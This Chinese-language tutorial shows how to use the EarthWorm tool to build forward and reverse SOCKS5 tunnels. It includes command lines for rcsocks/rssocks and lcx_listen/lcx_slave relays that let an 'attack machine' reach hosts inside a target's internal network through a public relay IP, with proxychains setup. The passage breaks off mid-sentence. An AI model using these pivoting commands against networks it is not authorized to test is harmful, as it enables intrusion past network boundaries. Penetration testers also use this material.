1. 程式人生 > >使用 EW 作Socks5代理

使用 EW 作Socks5代理

簡介: EarthWorm是一款用於開啟 SOCKS v5 代理服務的工具,基於標準 C 開發,可提供多平臺間的轉接通訊,用於複雜網路環境下的資料轉發。 主頁: http://rootkiter.com/EarthWorm/   ew專案地址: https://github.com/idlefire/ew   【使用場景】 普通網路環境: 1. 目標網路邊界存在公網IP且可任意開監聽埠: a)./ew -s ssocksd -l 8888 開啟 8888 埠的 socks 代理 b) 攻擊機通過訪問 目標主機8888 埠使用目標主機提供的代理 2. 目標網路邊界不存在公網 IP,需要通過反彈方式建立 socks 代理 a) ./ew -s rcsocks -l 1080 -e 8888 // 在公網主機新增轉接隧道,將 1080 收到的代理請求轉交給反連 8888 埠的主機 b) ./ew -s rssocks -d 1.1.1.1 -e 8888 // 將目標網路的可控邊界主機反向連線公網主機8888埠 c) 攻擊機可通過訪問公網主機1080 埠使用 rssocks 主機提供的 socks5 代理服務 使用EW做反向Socks5代理 1.在公網伺服器上執行以下命令: ./ew_for_linux64 -s rcsocks -l 1080 -e 1024 監聽本機的1080埠轉發到反連1024埠的主機 2.在目標機器執行以下命令 .\ew_for_Win.exe -s rssocks -d 97.64.80.23 -e 1024 通過socks隧道連線公網IP的1024埠 3.攻擊機kali通過proxychins或者瀏覽器配置socks5代理訪問目標內網機器 第一種:使用socks代理訪問目標內網 使用Python開啟web服務 在kali上訪問目標內網IP即可訪問web服務   使用proxychins訪問目標內網 編輯proxychins配置檔案 vim /etc/proxychains.conf 然後訪問使用proxychains代理訪問 127.0.0.1, 就成功了:
  二重網路環境 攻擊機:內網主機 kali A 攻擊機:公網主機 debian B 目標主機A:目標網路的邊界主機,無公網 IP,無法訪問特定資源。 目標主機B:目標網路內部主機,可訪問特定資源,卻無法回連公網。 A 主機可直連 B 主機   1.公網主機B新增轉接隧道 ./ew_for_linux64 -s lcx_listen -l 1080 -e 1024 監聽本機的1080埠轉發到反連1024埠的主機 2.在內網主機B上利用 ssocksd 方式啟動 9999 埠的 socks 代理 .\ew_for_Win.exe -s ssocksd -l 9999 3.在內網主機A上通過工具的lcx_slave方式,打通公網主機1024埠和主機B 9999之間的通訊隧道 .\ew_for_Win.exe -s lcx_slave -d 97.64.80.23 -e 1024 -f 192.168.245.131 -g 9999
4.內網攻擊主機kali 通過訪問 公網主機1080埠來使用 內網主機B提供的 socks5 代理     【引數說明】 目前工具提供六種鏈路狀態,可通過 -s 引數進行選定,分別為: ssocksd rcsocks rssocks lcx_slave lcx_tran lcx_listen SOCKS5 服務的核心邏輯支援由 ssocksd 和 rssocks 提供,分別對應正向與反向socks代理。 其餘的 lcx 鏈路狀態用於打通測試主機同 socks 伺服器之間的通路。 lcx 類別管道: lcx_slave 該管道一側通過反彈方式連線代理請求方,另一側連線代理提供主機。 lcx_tran 該管道,通過監聽本地埠接收代理請求,並轉交給代理提供主機。 lcx_listen 該管道,通過監聽本地埠接收資料,並將其轉交給目標